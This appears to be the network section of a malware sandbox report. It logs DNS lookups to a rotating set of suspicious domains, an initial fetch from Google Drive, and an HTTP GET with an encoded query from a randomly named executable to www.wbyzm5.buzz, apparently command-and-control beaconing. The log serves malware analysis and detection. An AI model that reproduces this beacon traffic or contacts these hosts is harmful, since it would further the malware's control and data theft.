                                                                                    Mar 18, 2024 15:10:43.179847002 CET8049843103.146.179.172192.168.11.30
                                                                                    Mar 18, 2024 15:10:43.180219889 CET4984380192.168.11.30103.146.179.172
                                                                                    Mar 18, 2024 15:10:43.180385113 CET4984380192.168.11.30103.146.179.172
                                                                                    Mar 18, 2024 15:10:43.512027025 CET8049843103.146.179.172192.168.11.30
                                                                                    Mar 18, 2024 15:10:48.575165033 CET4984480192.168.11.30109.234.166.81
                                                                                    Mar 18, 2024 15:10:48.748646975 CET8049844109.234.166.81192.168.11.30
                                                                                    Mar 18, 2024 15:10:48.748893023 CET4984480192.168.11.30109.234.166.81
                                                                                    Mar 18, 2024 15:10:48.749150991 CET4984480192.168.11.30109.234.166.81
                                                                                    Mar 18, 2024 15:10:48.922384024 CET8049844109.234.166.81192.168.11.30
                                                                                    Mar 18, 2024 15:10:48.923027992 CET8049844109.234.166.81192.168.11.30
                                                                                    Mar 18, 2024 15:10:48.923057079 CET8049844109.234.166.81192.168.11.30
                                                                                    Mar 18, 2024 15:10:48.923269033 CET4984480192.168.11.30109.234.166.81
                                                                                    Mar 18, 2024 15:10:50.263848066 CET4984480192.168.11.30109.234.166.81
                                                                                    Mar 18, 2024 15:10:51.279468060 CET4984580192.168.11.30109.234.166.81
                                                                                    Mar 18, 2024 15:10:51.453069925 CET8049845109.234.166.81192.168.11.30
                                                                                    Mar 18, 2024 15:10:51.453365088 CET4984580192.168.11.30109.234.166.81
                                                                                    Mar 18, 2024 15:10:51.453597069 CET4984580192.168.11.30109.234.166.81
                                                                                    Mar 18, 2024 15:10:51.626744032 CET8049845109.234.166.81192.168.11.30
                                                                                    Mar 18, 2024 15:10:51.627295017 CET8049845109.234.166.81192.168.11.30
                                                                                    Mar 18, 2024 15:10:51.627315044 CET8049845109.234.166.81192.168.11.30
                                                                                    Mar 18, 2024 15:10:51.627590895 CET4984580192.168.11.30109.234.166.81
                                                                                    Mar 18, 2024 15:10:52.966286898 CET4984580192.168.11.30109.234.166.81
                                                                                    Mar 18, 2024 15:10:53.981986046 CET4984680192.168.11.30109.234.166.81
                                                                                    Mar 18, 2024 15:10:54.154684067 CET8049846109.234.166.81192.168.11.30
                                                                                    Mar 18, 2024 15:10:54.154905081 CET4984680192.168.11.30109.234.166.81
                                                                                    Mar 18, 2024 15:10:54.155198097 CET4984680192.168.11.30109.234.166.81
                                                                                    Mar 18, 2024 15:10:54.328437090 CET8049846109.234.166.81192.168.11.30
                                                                                    Mar 18, 2024 15:10:54.328517914 CET8049846109.234.166.81192.168.11.30
                                                                                    Mar 18, 2024 15:10:54.328897953 CET8049846109.234.166.81192.168.11.30
                                                                                    Mar 18, 2024 15:10:54.328975916 CET8049846109.234.166.81192.168.11.30
                                                                                    Mar 18, 2024 15:10:54.329144955 CET4984680192.168.11.30109.234.166.81
                                                                                    Mar 18, 2024 15:10:55.668836117 CET4984680192.168.11.30109.234.166.81
                                                                                    Mar 18, 2024 15:10:56.684438944 CET4984780192.168.11.30109.234.166.81
                                                                                    Mar 18, 2024 15:10:56.860156059 CET8049847109.234.166.81192.168.11.30
                                                                                    Mar 18, 2024 15:10:56.860357046 CET4984780192.168.11.30109.234.166.81
                                                                                    Mar 18, 2024 15:10:56.860553026 CET4984780192.168.11.30109.234.166.81
                                                                                    Mar 18, 2024 15:10:57.032620907 CET8049847109.234.166.81192.168.11.30
                                                                                    Mar 18, 2024 15:11:03.898165941 CET8049847109.234.166.81192.168.11.30
                                                                                    Mar 18, 2024 15:11:03.898247957 CET8049847109.234.166.81192.168.11.30
                                                                                    Mar 18, 2024 15:11:03.898729086 CET4984780192.168.11.30109.234.166.81
                                                                                    Mar 18, 2024 15:11:03.898792028 CET4984780192.168.11.30109.234.166.81
                                                                                    Mar 18, 2024 15:11:04.072140932 CET8049847109.234.166.81192.168.11.30
                                                                                    Mar 18, 2024 15:11:33.426767111 CET4984880192.168.11.30156.232.32.175
                                                                                    Mar 18, 2024 15:11:34.441363096 CET4984880192.168.11.30156.232.32.175
                                                                                    Mar 18, 2024 15:11:36.456557989 CET4984880192.168.11.30156.232.32.175
                                                                                    Mar 18, 2024 15:11:40.471287012 CET4984880192.168.11.30156.232.32.175
                                                                                    Mar 18, 2024 15:11:48.485260963 CET4984880192.168.11.30156.232.32.175
                                                                                    Mar 18, 2024 15:11:55.515652895 CET4984880192.168.11.30156.232.32.175
                                                                                    Mar 18, 2024 15:11:56.530334949 CET4984880192.168.11.30156.232.32.175
                                                                                    Mar 18, 2024 15:11:58.545475960 CET4984880192.168.11.30156.232.32.175
                                                                                    Mar 18, 2024 15:12:02.560103893 CET4984880192.168.11.30156.232.32.175
                                                                                    Mar 18, 2024 15:12:10.574053049 CET4984880192.168.11.30156.232.32.175
                                                                                    Mar 18, 2024 15:12:17.604298115 CET4984880192.168.11.30156.232.32.175
                                                                                    Mar 18, 2024 15:12:18.619060993 CET4984880192.168.11.30156.232.32.175
                                                                                    Mar 18, 2024 15:12:20.634238005 CET4984880192.168.11.30156.232.32.175
                                                                                    Mar 18, 2024 15:12:24.649005890 CET4984880192.168.11.30156.232.32.175
                                                                                    Mar 18, 2024 15:12:32.662872076 CET4984880192.168.11.30156.232.32.175
                                                                                    Mar 18, 2024 15:12:39.693475962 CET4984880192.168.11.30156.232.32.175
                                                                                    Mar 18, 2024 15:12:40.707968950 CET4984880192.168.11.30156.232.32.175
                                                                                    Mar 18, 2024 15:12:42.723071098 CET4984880192.168.11.30156.232.32.175
                                                                                    Mar 18, 2024 15:12:46.737762928 CET4984880192.168.11.30156.232.32.175
                                                                                    Mar 18, 2024 15:12:54.751693010 CET4984880192.168.11.30156.232.32.175
                                                                                    Mar 18, 2024 15:13:00.774388075 CET4984980192.168.11.30156.232.32.175
                                                                                    Mar 18, 2024 15:13:01.781384945 CET4984980192.168.11.30156.232.32.175
                                                                                    Mar 18, 2024 15:13:03.796557903 CET4984980192.168.11.30156.232.32.175
                                                                                    Mar 18, 2024 15:13:07.811294079 CET4984980192.168.11.30156.232.32.175
                                                                                    Mar 18, 2024 15:13:08.796226978 CET4985080192.168.11.30154.39.248.133
                                                                                    Mar 18, 2024 15:13:09.810808897 CET4985080192.168.11.30154.39.248.133
                                                                                    Mar 18, 2024 15:13:11.826056004 CET4985080192.168.11.30154.39.248.133
                                                                                    Mar 18, 2024 15:13:15.825115919 CET4984980192.168.11.30156.232.32.175
                                                                                    Mar 18, 2024 15:13:15.840660095 CET4985080192.168.11.30154.39.248.133
                                                                                    Mar 18, 2024 15:13:23.854561090 CET4985080192.168.11.30154.39.248.133
                                                                                    Mar 18, 2024 15:13:30.884803057 CET4985080192.168.11.30154.39.248.133
                                                                                    Mar 18, 2024 15:13:31.899637938 CET4985080192.168.11.30154.39.248.133
                                                                                    Mar 18, 2024 15:13:33.914805889 CET4985080192.168.11.30154.39.248.133
                                                                                    Mar 18, 2024 15:13:37.929527044 CET4985080192.168.11.30154.39.248.133
                                                                                    Mar 18, 2024 15:13:45.943371058 CET4985080192.168.11.30154.39.248.133
                                                                                    Mar 18, 2024 15:13:52.973974943 CET4985080192.168.11.30154.39.248.133
                                                                                    Mar 18, 2024 15:13:53.988478899 CET4985080192.168.11.30154.39.248.133
                                                                                    Mar 18, 2024 15:13:56.003726006 CET4985080192.168.11.30154.39.248.133
                                                                                    Mar 18, 2024 15:14:00.018423080 CET4985080192.168.11.30154.39.248.133
                                                                                    Mar 18, 2024 15:14:08.032203913 CET4985080192.168.11.30154.39.248.133
                                                                                    Mar 18, 2024 15:14:15.062848091 CET4985080192.168.11.30154.39.248.133
                                                                                    Mar 18, 2024 15:14:16.077296972 CET4985080192.168.11.30154.39.248.133
                                                                                    Mar 18, 2024 15:14:18.092492104 CET4985080192.168.11.30154.39.248.133
                                                                                    Mar 18, 2024 15:14:22.107193947 CET4985080192.168.11.30154.39.248.133
                                                                                    Mar 18, 2024 15:14:30.121078014 CET4985080192.168.11.30154.39.248.133
                                                                                    Mar 18, 2024 15:14:36.139872074 CET4985180192.168.11.30154.55.135.138
                                                                                    Mar 18, 2024 15:14:37.150784016 CET4985180192.168.11.30154.55.135.138
                                                                                    Mar 18, 2024 15:14:39.165982008 CET4985180192.168.11.30154.55.135.138
                                                                                    Mar 18, 2024 15:14:43.180646896 CET4985180192.168.11.30154.55.135.138
                                                                                    Mar 18, 2024 15:14:44.821124077 CET4985280192.168.11.30172.67.130.3
                                                                                    Mar 18, 2024 15:14:44.916542053 CET8049852172.67.130.3192.168.11.30
                                                                                    Mar 18, 2024 15:14:44.916827917 CET4985280192.168.11.30172.67.130.3
                                                                                    Mar 18, 2024 15:14:44.917244911 CET4985280192.168.11.30172.67.130.3
                                                                                    Mar 18, 2024 15:14:45.012453079 CET8049852172.67.130.3192.168.11.30
                                                                                    Mar 18, 2024 15:14:45.057276964 CET8049852172.67.130.3192.168.11.30
                                                                                    Mar 18, 2024 15:14:45.058305979 CET8049852172.67.130.3192.168.11.30
                                                                                    Mar 18, 2024 15:14:45.058480978 CET4985280192.168.11.30172.67.130.3

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Mar 18, 2024 15:06:50.803505898 CET5824653192.168.11.301.1.1.1
                                                                                    Mar 18, 2024 15:06:50.898991108 CET53582461.1.1.1192.168.11.30
                                                                                    Mar 18, 2024 15:06:51.426450014 CET5797853192.168.11.301.1.1.1
                                                                                    Mar 18, 2024 15:06:51.522536039 CET53579781.1.1.1192.168.11.30
                                                                                    Mar 18, 2024 15:07:18.371567965 CET6332853192.168.11.301.1.1.1
                                                                                    Mar 18, 2024 15:07:18.472374916 CET53633281.1.1.1192.168.11.30
                                                                                    Mar 18, 2024 15:07:23.482563019 CET5521253192.168.11.301.1.1.1
                                                                                    Mar 18, 2024 15:07:23.612682104 CET53552121.1.1.1192.168.11.30
                                                                                    Mar 18, 2024 15:07:28.622328043 CET5396553192.168.11.301.1.1.1
                                                                                    Mar 18, 2024 15:07:28.753566027 CET53539651.1.1.1192.168.11.30
                                                                                    Mar 18, 2024 15:07:33.761650085 CET5393153192.168.11.301.1.1.1
                                                                                    Mar 18, 2024 15:07:34.336528063 CET53539311.1.1.1192.168.11.30
                                                                                    Mar 18, 2024 15:07:56.929498911 CET6510653192.168.11.301.1.1.1
                                                                                    Mar 18, 2024 15:07:57.025520086 CET53651061.1.1.1192.168.11.30
                                                                                    Mar 18, 2024 15:08:03.442483902 CET5864453192.168.11.301.1.1.1
                                                                                    Mar 18, 2024 15:08:04.457387924 CET5864453192.168.11.309.9.9.9
                                                                                    Mar 18, 2024 15:08:05.472676992 CET5864453192.168.11.301.1.1.1
                                                                                    Mar 18, 2024 15:08:05.942555904 CET53586441.1.1.1192.168.11.30
                                                                                    Mar 18, 2024 15:08:05.942568064 CET53586441.1.1.1192.168.11.30
                                                                                    Mar 18, 2024 15:08:08.125972986 CET53586449.9.9.9192.168.11.30
                                                                                    Mar 18, 2024 15:08:27.267816067 CET5717353192.168.11.301.1.1.1
                                                                                    Mar 18, 2024 15:08:28.280076027 CET5717353192.168.11.309.9.9.9
                                                                                    Mar 18, 2024 15:08:28.381619930 CET53571739.9.9.9192.168.11.30
                                                                                    Mar 18, 2024 15:08:28.560143948 CET53571731.1.1.1192.168.11.30
                                                                                    Mar 18, 2024 15:08:35.044641018 CET5826453192.168.11.309.9.9.9
                                                                                    Mar 18, 2024 15:08:35.151707888 CET53582649.9.9.9192.168.11.30
                                                                                    Mar 18, 2024 15:08:45.386028051 CET6210153192.168.11.309.9.9.9
                                                                                    Mar 18, 2024 15:08:45.584635019 CET53621019.9.9.9192.168.11.30
                                                                                    Mar 18, 2024 15:08:58.945593119 CET5371553192.168.11.309.9.9.9
                                                                                    Mar 18, 2024 15:08:59.120085001 CET53537159.9.9.9192.168.11.30
                                                                                    Mar 18, 2024 15:09:13.020299911 CET5041253192.168.11.309.9.9.9
                                                                                    Mar 18, 2024 15:09:13.163064003 CET53504129.9.9.9192.168.11.30
                                                                                    Mar 18, 2024 15:09:26.751497984 CET5711153192.168.11.309.9.9.9
                                                                                    Mar 18, 2024 15:09:26.854461908 CET53571119.9.9.9192.168.11.30
                                                                                    Mar 18, 2024 15:09:34.905982018 CET5512953192.168.11.309.9.9.9
                                                                                    Mar 18, 2024 15:09:35.111620903 CET53551299.9.9.9192.168.11.30
                                                                                    Mar 18, 2024 15:09:48.621651888 CET5521053192.168.11.309.9.9.9
                                                                                    Mar 18, 2024 15:09:48.829052925 CET53552109.9.9.9192.168.11.30
                                                                                    Mar 18, 2024 15:10:02.181162119 CET5365953192.168.11.309.9.9.9
                                                                                    Mar 18, 2024 15:10:02.492353916 CET53536599.9.9.9192.168.11.30
                                                                                    Mar 18, 2024 15:10:16.037446022 CET5339253192.168.11.309.9.9.9
                                                                                    Mar 18, 2024 15:10:16.146116018 CET53533929.9.9.9192.168.11.30
                                                                                    Mar 18, 2024 15:10:29.846930027 CET5200153192.168.11.309.9.9.9
                                                                                    Mar 18, 2024 15:10:30.861861944 CET5200153192.168.11.301.1.1.1
                                                                                    Mar 18, 2024 15:10:31.877206087 CET5200153192.168.11.309.9.9.9
                                                                                    Mar 18, 2024 15:10:33.892349005 CET5200153192.168.11.301.1.1.1
                                                                                    Mar 18, 2024 15:10:33.892370939 CET5200153192.168.11.309.9.9.9
                                                                                    Mar 18, 2024 15:10:33.934456110 CET53520011.1.1.1192.168.11.30
                                                                                    Mar 18, 2024 15:10:33.987131119 CET53520011.1.1.1192.168.11.30
                                                                                    Mar 18, 2024 15:10:34.326106071 CET53520019.9.9.9192.168.11.30
                                                                                    Mar 18, 2024 15:10:48.186726093 CET6353753192.168.11.301.1.1.1
                                                                                    Mar 18, 2024 15:10:48.573256016 CET53635371.1.1.1192.168.11.30
                                                                                    Mar 18, 2024 15:11:11.948113918 CET5120153192.168.11.301.1.1.1
                                                                                    Mar 18, 2024 15:11:12.049202919 CET53512011.1.1.1192.168.11.30
                                                                                    Mar 18, 2024 15:11:17.055088997 CET5527653192.168.11.301.1.1.1
                                                                                    Mar 18, 2024 15:11:17.184489012 CET53552761.1.1.1192.168.11.30
                                                                                    Mar 18, 2024 15:11:25.240816116 CET6319353192.168.11.301.1.1.1
                                                                                    Mar 18, 2024 15:11:25.371534109 CET53631931.1.1.1192.168.11.30

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Mar 18, 2024 15:06:50.803505898 CET192.168.11.301.1.1.10xfebcStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:06:51.426450014 CET192.168.11.301.1.1.10x455aStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:07:18.371567965 CET192.168.11.301.1.1.10xbf95Standard query (0)www.mehr-neukunden.onlineA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:07:23.482563019 CET192.168.11.301.1.1.10x8044Standard query (0)www.midwestnationalflying.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:07:28.622328043 CET192.168.11.301.1.1.10x36f8Standard query (0)www.artcitytheatre.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:07:33.761650085 CET192.168.11.301.1.1.10x68b5Standard query (0)www.t3c1srf.siteA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:07:56.929498911 CET192.168.11.301.1.1.10x415cStandard query (0)www.t3c1srf.siteA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:08:03.442483902 CET192.168.11.301.1.1.10x3538Standard query (0)www.p65cq675did.shopA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:08:04.457387924 CET192.168.11.309.9.9.90x3538Standard query (0)www.p65cq675did.shopA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:08:05.472676992 CET192.168.11.301.1.1.10x3538Standard query (0)www.p65cq675did.shopA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:08:27.267816067 CET192.168.11.301.1.1.10xa931Standard query (0)www.p65cq675did.shopA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:08:28.280076027 CET192.168.11.309.9.9.90xa931Standard query (0)www.p65cq675did.shopA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:08:35.044641018 CET192.168.11.309.9.9.90x6471Standard query (0)www.wbyzm5.buzzA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:08:45.386028051 CET192.168.11.309.9.9.90x618eStandard query (0)www.xiefly.shopA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:08:58.945593119 CET192.168.11.309.9.9.90xa1caStandard query (0)www.dreadbed.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:09:13.020299911 CET192.168.11.309.9.9.90x84c7Standard query (0)www.stellerechoes.xyzA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:09:26.751497984 CET192.168.11.309.9.9.90x266aStandard query (0)www.sengogkaffe.infoA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:09:34.905982018 CET192.168.11.309.9.9.90x8b2fStandard query (0)www.b-r-consulting.chA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:09:48.621651888 CET192.168.11.309.9.9.90xe883Standard query (0)www.teenpattimasterapp.orgA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:10:02.181162119 CET192.168.11.309.9.9.90xbe3aStandard query (0)www.clarycyber.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:10:16.037446022 CET192.168.11.309.9.9.90x4091Standard query (0)www.mvmusicfactory.orgA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:10:29.846930027 CET192.168.11.309.9.9.90xb5c1Standard query (0)www.kmyangjia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:10:30.861861944 CET192.168.11.301.1.1.10xb5c1Standard query (0)www.kmyangjia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:10:31.877206087 CET192.168.11.309.9.9.90xb5c1Standard query (0)www.kmyangjia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:10:33.892349005 CET192.168.11.301.1.1.10xb5c1Standard query (0)www.kmyangjia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:10:33.892370939 CET192.168.11.309.9.9.90xb5c1Standard query (0)www.kmyangjia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:10:48.186726093 CET192.168.11.301.1.1.10x4a5dStandard query (0)www.globalworld-travel.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:11:11.948113918 CET192.168.11.301.1.1.10x93e6Standard query (0)www.mehr-neukunden.onlineA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:11:17.055088997 CET192.168.11.301.1.1.10xdcfbStandard query (0)www.midwestnationalflying.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:11:25.240816116 CET192.168.11.301.1.1.10xd0b1Standard query (0)www.artcitytheatre.comA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Mar 18, 2024 15:06:50.898991108 CET1.1.1.1192.168.11.300xfebcNo error (0)drive.google.com142.250.65.174A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:06:51.522536039 CET1.1.1.1192.168.11.300x455aNo error (0)drive.usercontent.google.com142.251.41.1A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:07:18.472374916 CET1.1.1.1192.168.11.300xbf95Name error (3)www.mehr-neukunden.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:07:23.612682104 CET1.1.1.1192.168.11.300x8044Name error (3)www.midwestnationalflying.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:07:28.753566027 CET1.1.1.1192.168.11.300x36f8Name error (3)www.artcitytheatre.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:07:34.336528063 CET1.1.1.1192.168.11.300x68b5No error (0)www.t3c1srf.site156.232.32.175A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:07:57.025520086 CET1.1.1.1192.168.11.300x415cNo error (0)www.t3c1srf.site156.232.32.175A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:08:05.942555904 CET1.1.1.1192.168.11.300x3538No error (0)www.p65cq675did.shopk2-ld.wakak1.shopCNAME (Canonical name)IN (0x0001)false
                                                                                    Mar 18, 2024 15:08:05.942555904 CET1.1.1.1192.168.11.300x3538No error (0)k2-ld.wakak1.shop154.39.248.133A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:08:05.942555904 CET1.1.1.1192.168.11.300x3538No error (0)k2-ld.wakak1.shop154.55.135.138A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:08:05.942568064 CET1.1.1.1192.168.11.300x3538No error (0)www.p65cq675did.shopk2-ld.wakak1.shopCNAME (Canonical name)IN (0x0001)false
                                                                                    Mar 18, 2024 15:08:05.942568064 CET1.1.1.1192.168.11.300x3538No error (0)k2-ld.wakak1.shop154.39.248.133A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:08:05.942568064 CET1.1.1.1192.168.11.300x3538No error (0)k2-ld.wakak1.shop154.55.135.138A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:08:08.125972986 CET9.9.9.9192.168.11.300x3538No error (0)www.p65cq675did.shopk2-ld.wakak1.shopCNAME (Canonical name)IN (0x0001)false
                                                                                    Mar 18, 2024 15:08:08.125972986 CET9.9.9.9192.168.11.300x3538No error (0)k2-ld.wakak1.shop154.55.135.138A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:08:08.125972986 CET9.9.9.9192.168.11.300x3538No error (0)k2-ld.wakak1.shop154.39.248.133A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:08:28.381619930 CET9.9.9.9192.168.11.300xa931No error (0)www.p65cq675did.shopk2-ld.wakak1.shopCNAME (Canonical name)IN (0x0001)false
                                                                                    Mar 18, 2024 15:08:28.381619930 CET9.9.9.9192.168.11.300xa931No error (0)k2-ld.wakak1.shop154.55.135.138A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:08:28.381619930 CET9.9.9.9192.168.11.300xa931No error (0)k2-ld.wakak1.shop154.39.248.133A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:08:28.560143948 CET1.1.1.1192.168.11.300xa931No error (0)www.p65cq675did.shopk2-ld.wakak1.shopCNAME (Canonical name)IN (0x0001)false
                                                                                    Mar 18, 2024 15:08:28.560143948 CET1.1.1.1192.168.11.300xa931No error (0)k2-ld.wakak1.shop154.39.248.133A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:08:28.560143948 CET1.1.1.1192.168.11.300xa931No error (0)k2-ld.wakak1.shop154.55.135.138A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:08:35.151707888 CET9.9.9.9192.168.11.300x6471No error (0)www.wbyzm5.buzz172.67.130.3A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:08:35.151707888 CET9.9.9.9192.168.11.300x6471No error (0)www.wbyzm5.buzz104.21.3.12A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:08:45.584635019 CET9.9.9.9192.168.11.300x618eNo error (0)www.xiefly.shopxiefly.shopCNAME (Canonical name)IN (0x0001)false
                                                                                    Mar 18, 2024 15:08:45.584635019 CET9.9.9.9192.168.11.300x618eNo error (0)xiefly.shop82.180.172.14A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:08:59.120085001 CET9.9.9.9192.168.11.300xa1caNo error (0)www.dreadbed.com198.54.117.242A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:09:13.163064003 CET9.9.9.9192.168.11.300x84c7No error (0)www.stellerechoes.xyz198.177.123.106A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:09:26.854461908 CET9.9.9.9192.168.11.300x266aName error (3)www.sengogkaffe.infononenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:09:35.111620903 CET9.9.9.9192.168.11.300x8b2fNo error (0)www.b-r-consulting.ch194.191.24.38A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:09:48.829052925 CET9.9.9.9192.168.11.300xe883No error (0)www.teenpattimasterapp.orgteenpattimasterapp.orgCNAME (Canonical name)IN (0x0001)false
                                                                                    Mar 18, 2024 15:09:48.829052925 CET9.9.9.9192.168.11.300xe883No error (0)teenpattimasterapp.org84.32.84.32A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:10:02.492353916 CET9.9.9.9192.168.11.300xbe3aNo error (0)www.clarycyber.comclarycyber.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Mar 18, 2024 15:10:02.492353916 CET9.9.9.9192.168.11.300xbe3aNo error (0)clarycyber.com62.149.128.45A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:10:16.146116018 CET9.9.9.9192.168.11.300x4091No error (0)www.mvmusicfactory.orgparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Mar 18, 2024 15:10:16.146116018 CET9.9.9.9192.168.11.300x4091No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:10:33.934456110 CET1.1.1.1192.168.11.300xb5c1No error (0)www.kmyangjia.comcname.x172.zbwdj.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Mar 18, 2024 15:10:33.934456110 CET1.1.1.1192.168.11.300xb5c1No error (0)cname.x172.zbwdj.com103.146.179.172A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:10:33.987131119 CET1.1.1.1192.168.11.300xb5c1No error (0)www.kmyangjia.comcname.x172.zbwdj.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Mar 18, 2024 15:10:33.987131119 CET1.1.1.1192.168.11.300xb5c1No error (0)cname.x172.zbwdj.com103.146.179.172A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:10:34.326106071 CET9.9.9.9192.168.11.300xb5c1No error (0)www.kmyangjia.comcname.x172.zbwdj.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Mar 18, 2024 15:10:34.326106071 CET9.9.9.9192.168.11.300xb5c1No error (0)cname.x172.zbwdj.com103.146.179.172A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:10:48.573256016 CET1.1.1.1192.168.11.300x4a5dNo error (0)www.globalworld-travel.comglobalworld-travel.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Mar 18, 2024 15:10:48.573256016 CET1.1.1.1192.168.11.300x4a5dNo error (0)globalworld-travel.com109.234.166.81A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:11:12.049202919 CET1.1.1.1192.168.11.300x93e6Name error (3)www.mehr-neukunden.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:11:17.184489012 CET1.1.1.1192.168.11.300xdcfbName error (3)www.midwestnationalflying.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 15:11:25.371534109 CET1.1.1.1192.168.11.300xd0b1Name error (3)www.artcitytheatre.comnonenoneA (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • drive.google.com
                                                                                    • drive.usercontent.google.com
                                                                                    • www.wbyzm5.buzz
                                                                                    • www.xiefly.shop
                                                                                    • www.dreadbed.com
                                                                                    • www.stellerechoes.xyz
                                                                                    • www.b-r-consulting.ch
                                                                                    • www.teenpattimasterapp.org
                                                                                    • www.clarycyber.com
                                                                                    • www.mvmusicfactory.org
                                                                                    • www.kmyangjia.com
                                                                                    • www.globalworld-travel.com

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.11.3049810172.67.130.3806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:08:35.249447107 CET457OUTGET /v3ka/?c4qx7JIP=5DSEd0ATp85KgzdrFCdxbLJep/S6iKShPg/Ik1pbcxCGQNrpEtjfCeVcF04T3qlunhYKINQJ6NoaGwxZUUZob6VNNlK6Td1e1fYChuA8Yf+ZyRKX9C6Zn4U=&K4W=bb2HuFjPIN HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.wbyzm5.buzz
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Mar 18, 2024 15:08:35.354549885 CET780INHTTP/1.1 301 Moved Permanently
                                                                                    Date: Mon, 18 Mar 2024 14:08:35 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Mon, 18 Mar 2024 15:08:35 GMT
                                                                                    Location: https://www.wbyzm5.buzz/v3ka/?c4qx7JIP=5DSEd0ATp85KgzdrFCdxbLJep/S6iKShPg/Ik1pbcxCGQNrpEtjfCeVcF04T3qlunhYKINQJ6NoaGwxZUUZob6VNNlK6Td1e1fYChuA8Yf+ZyRKX9C6Zn4U=&K4W=bb2HuFjPIN
